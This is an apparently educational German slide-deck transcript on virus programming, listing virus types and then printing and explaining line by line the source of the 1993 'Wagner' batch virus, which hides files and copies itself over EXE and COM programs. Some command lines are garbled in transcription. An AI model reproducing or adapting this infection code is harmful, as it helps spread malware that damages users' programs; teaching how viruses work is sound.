Viern - Progammierung. Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile.

Slides:



Advertisements
Ähnliche Präsentationen
VIREN UND ANDERE TIERE.
Advertisements

Von Florian Wirths und Fabian Janik
Die Installation von Windows 95 erfordert etwas Vorarbeit: Als erstes müssen Sie mit einer Windows 95 Startdiskette den Computer booten.... Dabei wird.
PC-Senioren Ludwigsburg
Ausführen.
Mit dieser Methode vergleichen Sie sehr einfach zwei oder mehr Präsentationen Herbert Manthei
Fachvortrag: Computerviren
Viren? Wad‘n dat? Definition
Was ist eigentlich ein Computervirus?
Gefährdung durch Viren
PS: Basisinformationstechnologie Jens Alvermann
Windows Explorer.
Allgemein Batchdatei/en erstellen Was ist das?? Wie geht das??
Sicher durchs Internet
Sicherheit in vernetzten Systemen
Batch-Programmierung Grundlagen
Beiträge erheben Im Internet-Explorer müssen Sie zum Start der Präsentation Beitraege erheben.html auf das Leinwandsymbol unten rechts klicken. Mit einem.
Computerviren Hugo, Oskar, Nadia, Tony, Kevin, Leah
Viren Würmer und Trojaner
Viren,Würmer & Trojaner
Starbull Daten aktualisieren Anleitung. Outlook Express öffnen, um die Datei ADS.ADR abzurufen.
Programmieren mit MS Small Basic
Gerade bei Fotobearbeitungen kann es leicht zum Verlust der Dateierweiterung (file extension) kommen. Nach stundenlanger Arbeit lässt sich eine Datei nicht.
Angriffe durch Viren, Würmer und Trojaner
Computerviren Inhaltsverzeichnis.
Windows Befehlsskript
Weiter mit Mausklick. Anrufer: H HH Hi, ich hab hier ein neues Programm, das würd ich gern auf meinem persönlichen Rechner installieren Es heißt Liebe".
AnRufer HY ~ ich hab hier ein neues Programm das würd ich gern auf meinem Persönlichen Rechner installieren es heißt « wahre Liebe » was soll ich denn.
Patrick Schmerlaib. Scriptsprachen: sind Programmiersprachen Verzichten auf Sprachelemente Vorteile: schnelle Erstellung kleiner Programme Flexible Sprache.
Was ist ein Computervirus?
Seminar Internet Technologien
Problematik der Datensicherheit
Viren und Virenschutz.
Inhaltsverzeichnis Was ist Malware Folie 3 Worms Folie 4
DIE TROJANER Benjamin Leu & Joel Dietschi.
Von Patrik, Yannik, Marc und Luca
Trojaner.
Viren, Würmer und anderes Ungeziefer
PHP Basic.
Hast du deinen Ordner oder deine Datei im PC verloren?
Erste Schritte in DELPHI
Kommandozeile und Batch-Dateien Molekulare Phylogenetik – Praktikum
Von Florian, Patrick, Alexander und Heiko
Eine Präsentation von:
Ton einschalten und weiter mit Mausklick Anrufer: Hi, ich hab hier ein neues Programm, das würd ich gern auf meinem persönlichen Rechner installieren.
Technik schädlicher Software
Verbreitung von Viren, Würmern und Trojanern
Privatsphäre im Internet
Viren, Würmer+ co.
ü Datenverlust Schadprogramme Defekte Datenträger Ursachen
Mit einem Mausklick geht’s weiter
Blockseminar Allgemeine Technologien II Dozent: P. Sahle März 2009 PHP in HTML Referentin: Angela Brinck.
Ton einschalten und weiter mit Mausklick Anrufer: Hi, ich hab hier ein neues Programm, das würd ich gern auf meinem persönlichen Rechner installieren.
Rechtevergabe bei Windows 2000 Server Planung und Ausführung Schäffler und Lindauer.
Maya Kindler 5c. SEO- URL = Suchmaschinenoptimierung Alles was auf der Website steht wird von einer Suchmaschine gefunden und angezeigt. Alle Daten sind.
Ferngesteuerte Spam-Armeen 1. Verbreitung Verbreitung 2. Zweck Zweck 3. Herkunft Herkunft 4. Schutz Schutz.
Arten von Viren Es gibt verschiedene Arten von Viren.
Raphael Ender Tobias Breuß Bernhard Lang
Computerviren Sie verursachen Schäden in Milliardenhöhe und die Zahl der Virenattakten steigt jährlich.
Arten von Hacker und Virenangriffen
Vieren - Programmierung Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile.
Arten von Viren Es gibt verschiedene Arten von Viren.
Arten von Viren Es gibt verschiedene Arten von Viren.
Es gibt verschiedene Arten von Viren. Hier haben wir einige angeführt.
Arten von Hacker und Virenangriffen:
Schutz vor Viren und Würmern
Sie versuchen Schäden in Milliardenhöhe und die Zahl der Virenattakten steigt jährlich.
Computerviren.
Funktionen. Aufgabe : Eingabe zweier Zahlen ---> Minimum bestimmen Dann nochmals Eingabe zweier Zahlen ---> Minimum bestimmen.
DatenschutzPC-VirenSpywareSchädlingeAbwehr
 Präsentation transkript:

Viern - Progammierung

Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile haben sich die Programmierer aber immer bessere Tricks ausgedacht, um den fiesen Antivirenprogrammen zu entgehen. Ein Virus ist eigentlich immer nach folgendem Schema aufgebaut: 1.) Infektionsroutine, die für die Vermehrung sorgt 2.) Aktivierung. Hier wird festgelegt, wann sich der Virus meldet 3.) Handlung. Was soll er tun, HD löschen, Grüße ausrichten...? Das Ziel eines Virus- Programmierers ist meist nicht Schaden anzurichten, sondern, dass sich sein Virus oder möglichst weit verbreitet.

Man unterscheidet folgende Virentypen: Dateiviren : Sie infizieren meistens COM oder EXE Dateien, seltener jedoch BAT Dateien. Sie überschreiben Teile des Programms oder hängen sich an dessen Ende und werden bei jedem Programmstart aktiv und suchen dann nach weiteren Wirten. Makroviren : Makroviren nutzen die Makrosprache von Exel und Word und starten automatisch beim öffnen einer infizierten Datei. Etwa 70% aller heutigen Viren sind Makroviren. Hoax Viren : Dies sind keine wirklichen Viren, aber Warnungen vor Phantasieviren, die alles mögliche zerstören können. Allerdings werden diese Nachrichten gerne weiter versand, um auch Freunde vor dem ach so bösen Virus zu waren und verbreiten sich teilweise recht stark.

Batch –Viren Dies ist ein recht einfacher Virus, der sogenannte Wagner Virus der von Black Wolf 1993 in Virology 101 präsentiert wurde off ctty nul for %f in (*.exe *.com) do set A=%f if %A%==COMMAND.COM set A= rename %A% V%A% if not exist V%A% goto end attrib +h V%A% copy %0.bat %A% attrib +r %A% ren %A% *.bat set A= :end ctty exist V%0.com V%0.com %1 %2 exist V%0.exe V%0.exe %1 %2 %3

Die Befehle des Wagner – Virus off Dieser Befehl bewirkt, dass die Befehle des Programmes beim ausführen nicht angezeigt werden. ctty nul Hier werden alle Ausgaben ins Nichts geleitet. So das der 'Benutzer' nicht sieht, dass Dateien kopiert wurden. for %f in (*.exe *.com) do set A=%f Hier werden alle EXE und COM Dateien und schreibt jede Datei in die Variable A. Das bedeutet, dass am Ende die letzte, noch nicht infizierte Datei in der Variable A gespeichert wird. if %A%==COMMAND.COM set A= Falls A die Datei Command.COM enthaelt, wird A Null gesetzt

Die Befehle des Wagner – Virus II rename %A% V%A% Die gefundene Datei wird umbenannt in Vname if not exist V%A% goto end Sollte das Umbenennen schiefgegangen sein, wird zur Stelle :end gesprungen und beendet attrib +h V%A% Die umbenannte Datei wird versteckt und somit nur durch Parameter mit dem Befehl dir /a:h sichtbar, auserdem wird sie bei einer erneuten Ausfuehrung des Programmes nicht noch einmal umbenannt. copy %0.bat %A% Der Virus (%0%) wird an die Stelle der COM Datei kopiert

Die Befehle Des Wagner – Virus III attrib +r %A% Nun wird die Datei vor dem Ueberschreiben geschuetzt ren %A% *.bat Nun noch eine Umbenennung in eine BAT Datei set A= Der Parameter A wird wieder geleert, um keine Spuren zu hinterlassen :end Hierher wird mit goto end gesprungen ctty con Die Ausgabe wird wieder auf den Bildschirm exist V%0.com V%0.com %1 %2 %3 Falls die Ersetzte Datei eine COM Datei war, wird diese nun exist V%0.exe V%0.exe %1 %2 %3 wie eben nur mit EXE Dateien